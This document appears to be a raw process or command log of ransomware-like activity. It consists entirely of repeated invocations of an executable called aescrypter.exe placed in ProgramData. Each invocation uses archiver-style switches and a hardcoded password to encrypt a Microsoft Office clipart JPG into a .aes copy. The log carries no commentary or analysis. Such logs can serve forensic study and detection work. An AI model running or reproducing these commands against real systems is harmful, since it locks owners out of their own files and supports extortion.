"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

